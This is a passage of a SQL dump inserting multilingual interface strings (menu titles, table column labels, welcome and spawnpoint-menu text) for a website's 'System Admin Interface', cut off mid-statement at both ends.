2, '2015-04-20 01:39:54', '2015-04-20 01:39:54'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_todo', 'enUS', 'ToDo', 2, 2, '2015-04-17 19:19:37', '2015-04-17 19:19:37'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_todo', 'esES', 'ToDo', 2, 2, '2015-04-17 19:19:37', '2015-04-17 19:19:37'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_todo', 'frFR', 'ToDo', 2, 2, '2015-04-17 19:19:37', '2015-04-17 19:19:37'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_todo', 'jaJA', 'ToDoリスト', 1, 1, '2015-04-19 21:05:14', '2015-04-19 21:05:14'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_menu_todo', 'trTR', 'ToDo', 2, 2, '2015-04-17 19:19:37', '2015-04-17 19:19:37'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_mod_login_text', 'deDE', 'Für Entwicklerzugriff bitte einloggen (falls Sie Entwickler sind).', 0, 2, '2015-04-17 20:34:48', '2015-04-17 20:34:48'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_mod_login_text', 'enUS', 'Please login for developer access (if you are a developer).', 0, 0, '2015-04-16 20:27:32', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_mod_login_text', 'frFR', 'Connectez pour accès de développeur (si vous êtes un développeur).', 0, 0, '2015-04-16 20:27:32', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_mod_title', 'deDE', 'System Plugins', 2, 2, '2015-04-17 19:28:45', '2015-04-17 19:28:45'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_mod_title', 'enUS', 'System Mods', 2, 2, '2015-04-17 19:28:45', '2015-04-17 19:28:45'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_page_title', 'deDE', 'System Page', 2, 2, '2015-04-17 19:29:45', '2015-04-17 19:29:45'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_page_title', 'enUS', 'System Page', 2, 2, '2015-04-17 19:29:45', '2015-04-17 19:29:45'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_security_title', 'deDE', 'System Sicherheit', 2, 2, '2015-04-17 19:28:25', '2015-04-17 19:28:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_security_title', 'enUS', 'System Security', 2, 2, '2015-04-17 19:28:25', '2015-04-17 19:28:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_security_title', 'frFR', 'System Sécurité', 3, 3, '2015-04-20 19:17:16', '2015-04-20 19:17:16'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_start_welcome', 'deDE', 'Willkommen im SYSTEM Admin Interface - kurz SAI', 0, 0, '2015-04-16 22:59:29', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_start_welcome', 'enUS', '

Welcome to the SYSTEM Admin Interface - short SAI.

', 0, 1, '2015-04-16 22:59:29', '2015-04-16 22:59:29'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_start_welcome', 'frFR', 'Accueillir en System Admin Interface - court: SAI.', 3, 3, '2015-04-20 16:40:27', '2015-04-20 16:40:27'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_start_welcome', 'jaJA', '

SYSTEM-Admin-Interface、SAIて言う、へようこそ。

', 1, 2, '2015-04-16 22:59:29', '2015-04-16 19:16:02'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_start_welcome_description', 'deDE', 'Hier erhalten Sie eine Übersicht über Funktionen und Statistiken ihres Web-Projekts', 0, 0, '2015-04-16 22:56:37', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_start_welcome_description', 'enUS', 'From here you can control and manage your Website.', 0, 0, '2015-04-16 22:56:37', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_start_welcome_description', 'frFR', 'D\'ici tu peux contrôler ton site Web.', 3, 3, '2015-04-20 16:41:46', '2015-04-20 16:41:46'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_start_welcome_description', 'jaJA', '

SAIはあなたにプロジェクトのコントロールを挙げます。見渡しは下です。

', 1, 1, '2015-04-16 22:56:37', '2015-04-16 22:56:37'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_text_title', 'deDE', 'System Text', 2, 2, '2015-04-23 02:02:03', '2015-04-23 02:02:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_text_title', 'enUS', 'System Text', 2, 2, '2015-04-17 19:30:06', '2015-04-17 19:30:06'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_text_title', 'frFR', 'System Texte', 3, 3, '2015-04-20 19:17:35', '2015-04-20 19:17:35'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_title', 'deDE', '${project} - Admin Bereich', 1, 1, '2015-04-19 21:10:58', '2015-04-19 21:10:58'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_title', 'enUS', '${project} - Admin area', 2, 1, '2015-04-19 21:09:54', '2015-04-19 21:09:54'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_title', 'frFR', '${project} - Domaine d\'administration', 3, 3, '2015-04-20 19:12:40', '2015-04-20 19:12:40'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_title', 'jaJA', '${project} - アドミンーエリア', 1, 1, '2015-04-19 21:09:28', '2015-04-19 21:09:28'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_todo_title', 'deDE', 'System ToDo', 2, 2, '2015-04-23 01:53:37', '2015-04-23 01:53:37'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_todo_title', 'enUS', 'System ToDo', 2, 2, '2015-04-17 19:22:57', '2015-04-17 19:22:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_todo_title', 'esES', 'System ToDo', 2, 2, '2015-04-17 19:22:57', '2015-04-17 19:22:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_todo_title', 'frFR', 'System ToDo', 2, 2, '2015-04-17 19:22:57', '2015-04-17 19:22:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('sai_todo_title', 'trTR', 'System ToDo', 2, 2, '2015-04-17 19:22:57', '2015-04-17 19:22:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('server_version', 'deDE', 'mojo', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('server_version', 'enUS', 'mojo', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('spawn_friendlist_title', 'deDE', 'Freundesliste', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('spawn_friendlist_title', 'enUS', 'Friendlist', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('spawn_info_text', 'deDE', '
This is the Spawnpoint
Selection Menu.
\n
You can choose a City,
Friend or POI to spawn at
by clicking on it.
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('spawn_info_text', 'enUS', '
\n
\n
This is the Spawnpoint
Selection Menu.
\n
You can choose a City,
Friend or POI to spawn at
by clicking on it.
\n
\n
 
\n
', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('spawn_info_title', 'deDE', 'Info', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('spawn_info_title', 'enUS', 'Info', 0, 0, '2015-05-23 12:00:44', '0000-00-00 00:00:00'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_action', 'deDE', 'Aktion', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_action', 'enUS', 'Action', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_all', 'deDE', 'Alle', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_all', 'enUS', 'All', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_assignee', 'deDE', 'Beauftragter', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_assignee', 'enUS', 'Assignee', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_assignees', 'deDE', 'Beauftragte', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_assignees', 'enUS', 'Assignees', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_author', 'deDE', 'Autor', 2, 2, '2015-04-23 02:00:03', '2015-04-23 02:00:03'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_author', 'enUS', 'Author', 2, 2, '2015-04-18 13:36:35', '2015-04-18 13:36:35'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_author', 'frFR', 'Auteur', 3, 3, '2015-04-20 18:59:40', '2015-04-20 18:59:40'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_author_edit', 'deDE', 'Editor', 2, 2, '2015-04-21 03:43:51', '2015-04-21 03:43:51'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_author_edit', 'enUS', 'Editor', 2, 2, '2015-04-21 03:43:34', '2015-04-21 03:43:34'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_author_edit', 'frFR', 'Auteur du traitement', 2, 2, '2015-04-21 03:44:05', '2015-04-21 03:44:05'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_class', 'deDE', 'Klasse', 2, 2, '2015-04-23 01:58:51', '2015-04-23 01:58:51'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_class', 'enUS', 'Class', 2, 2, '2015-04-18 14:42:56', '2015-04-18 14:42:56'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_closed', 'deDE', 'Geschlossen', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_closed', 'enUS', 'Closed', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_code', 'deDE', 'Code', 2, 2, '2015-04-23 01:55:39', '2015-04-23 01:55:39'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_code', 'enUS', 'Code', 2, 2, '2015-04-18 13:50:05', '2015-04-18 13:50:05'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_count', 'deDE', '#Anzahl', 2, 2, '2015-04-18 14:43:20', '2015-04-18 14:43:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_count', 'enUS', '#Count', 2, 2, '2015-04-18 14:43:20', '2015-04-18 14:43:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_done', 'deDE', 'Fertig', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_done', 'enUS', 'Done', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_email', 'deDE', 'E-Mail', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_email', 'enUS', 'EMail', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_file', 'deDE', 'Datei', 2, 2, '2015-04-18 14:43:20', '2015-04-18 14:43:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_file', 'enUS', 'File', 2, 2, '2015-04-18 14:43:20', '2015-04-18 14:43:20'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_file', 'frFR', 'Fichier', 3, 3, '2015-04-20 19:03:04', '2015-04-20 19:03:04'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_http_referer', 'deDE', 'HTTP Referer', 2, 2, '2015-04-18 13:54:18', '2015-04-18 13:54:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_http_referer', 'enUS', 'HTTP Referer', 2, 2, '2015-04-18 13:54:18', '2015-04-18 13:54:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_http_user_agent', 'deDE', 'HTTP User Agent', 2, 2, '2015-04-18 13:54:48', '2015-04-18 13:54:48'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_http_user_agent', 'enUS', 'HTTP User Agent', 2, 2, '2015-04-18 13:54:48', '2015-04-18 13:54:48'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_id', 'deDE', 'ID', 2, 2, '2015-04-23 01:54:42', '2015-04-23 01:54:42'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_id', 'enUS', 'ID', 2, 2, '2015-04-18 13:49:38', '2015-04-18 13:49:38'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_interface', 'deDE', 'Schnittstelle', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_interface', 'enUS', 'Interface', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_ip', 'deDE', 'IP', 2, 2, '2015-04-23 01:59:06', '2015-04-23 01:59:06'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_ip', 'enUS', 'IP', 2, 2, '2015-04-18 14:43:51', '2015-04-18 14:43:51'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_join_date', 'deDE', 'Beitrittsdatum', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_join_date', 'enUS', 'Join Date', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_lang', 'deDE', 'Sprache', 2, 2, '2015-04-23 01:55:09', '2015-04-23 01:55:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_lang', 'enUS', 'Language', 2, 2, '2015-04-18 13:35:57', '2015-04-18 13:35:57'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_lang', 'frFR', 'Langue', 3, 3, '2015-04-20 18:56:16', '2015-04-20 18:56:16'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_language', 'deDE', 'Sprache', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_language', 'enUS', 'Language', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_last_active', 'deDE', 'Zuletzt aktiv', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_last_active', 'enUS', 'Last active', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_line', 'deDE', 'Zeile', 2, 2, '2015-04-18 14:43:31', '2015-04-18 14:43:31'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_line', 'enUS', 'Line', 2, 2, '2015-04-18 14:43:31', '2015-04-18 14:43:31'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_line', 'frFR', 'Ligne', 3, 3, '2015-04-20 19:03:28', '2015-04-20 19:03:28'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_message', 'deDE', 'Nachricht', 2, 2, '2015-04-23 01:57:28', '2015-04-23 01:57:28'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_message', 'enUS', 'Message', 2, 2, '2015-04-18 14:43:09', '2015-04-18 14:43:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_name', 'deDE', 'Name', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_name', 'enUS', 'Name', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_open', 'deDE', 'Offen', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_open', 'enUS', 'Open', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_percentage', 'deDE', '% Prozent', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_percentage', 'enUS', '% Percentage', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_post', 'deDE', 'POST', 2, 2, '2015-04-18 13:53:55', '2015-04-18 13:53:55'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_post', 'enUS', 'POST', 2, 2, '2015-04-18 13:53:55', '2015-04-18 13:53:55'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_priority', 'deDE', 'Priorität', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_priority', 'enUS', 'Priority', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_project', 'deDE', 'Projekt', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_project', 'enUS', 'Project', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_property', 'deDE', 'Eigenschaft', 2, 2, '2015-04-18 13:56:35', '2015-04-18 13:56:35'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_property', 'enUS', 'Property', 2, 2, '2015-04-18 13:56:35', '2015-04-18 13:56:35'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_querytime', 'deDE', 'Antwortzeit', 2, 2, '2015-04-18 14:44:18', '2015-04-18 14:44:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_querytime', 'enUS', 'Querytime', 2, 2, '2015-04-18 14:44:18', '2015-04-18 14:44:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_request_uri', 'deDE', 'Request URI', 2, 2, '2015-04-18 13:53:18', '2015-04-18 13:53:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_request_uri', 'enUS', 'Request URI', 2, 2, '2015-04-18 13:53:18', '2015-04-18 13:53:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_reset_password', 'deDE', 'Passwort zurücksetzen', 2, 2, '2015-04-23 01:58:25', '2015-04-23 01:58:25'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_reset_password', 'enUS', 'Reset Password', 2, 2, '2015-04-18 13:56:53', '2015-04-18 13:56:53'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_server_name', 'deDE', 'Server Name', 2, 2, '2015-04-18 13:52:35', '2015-04-18 13:52:35'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_server_name', 'enUS', 'Server Name', 2, 2, '2015-04-18 13:52:35', '2015-04-18 13:52:35'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_server_name', 'frFR', 'Nom du serveur', 3, 3, '2015-04-20 19:00:09', '2015-04-20 19:00:09'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_server_port', 'deDE', 'Server Port', 2, 2, '2015-04-18 13:52:55', '2015-04-18 13:52:55'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_server_port', 'enUS', 'Server Port', 2, 2, '2015-04-18 13:52:55', '2015-04-18 13:52:55'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_server_port', 'frFR', 'Port du serveur', 3, 3, '2015-04-20 19:08:14', '2015-04-20 19:08:14'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_text', 'deDE', 'Text', 2, 2, '2015-04-23 01:59:38', '2015-04-23 01:59:38'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_text', 'enUS', 'Text', 2, 2, '2015-04-18 13:36:18', '2015-04-18 13:36:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_text', 'frFR', 'Texte', 3, 3, '2015-04-20 18:59:12', '2015-04-20 18:59:12'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_thrown', 'deDE', 'Geworfen', 2, 2, '2015-04-23 01:56:35', '2015-04-23 01:56:35'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_thrown', 'enUS', 'Thrown', 2, 2, '2015-04-18 13:55:30', '2015-04-18 13:55:30'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_time', 'deDE', 'Zeit', 3, 3, '2015-04-20 18:58:16', '2015-04-20 18:58:16'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_time', 'enUS', 'Time', 2, 2, '2015-04-18 13:52:11', '2015-04-18 13:52:11'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_time', 'frFR', 'Temps', 3, 3, '2015-04-20 18:58:10', '2015-04-20 18:58:10'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_time_create', 'deDE', 'Erstellt', 2, 2, '2015-04-23 02:00:29', '2015-04-23 02:00:29'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_time_create', 'enUS', 'Creation Time', 2, 2, '2015-04-18 13:37:39', '2015-04-18 13:37:39'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('table_time_create', 'frFR', 'écrit', 3, 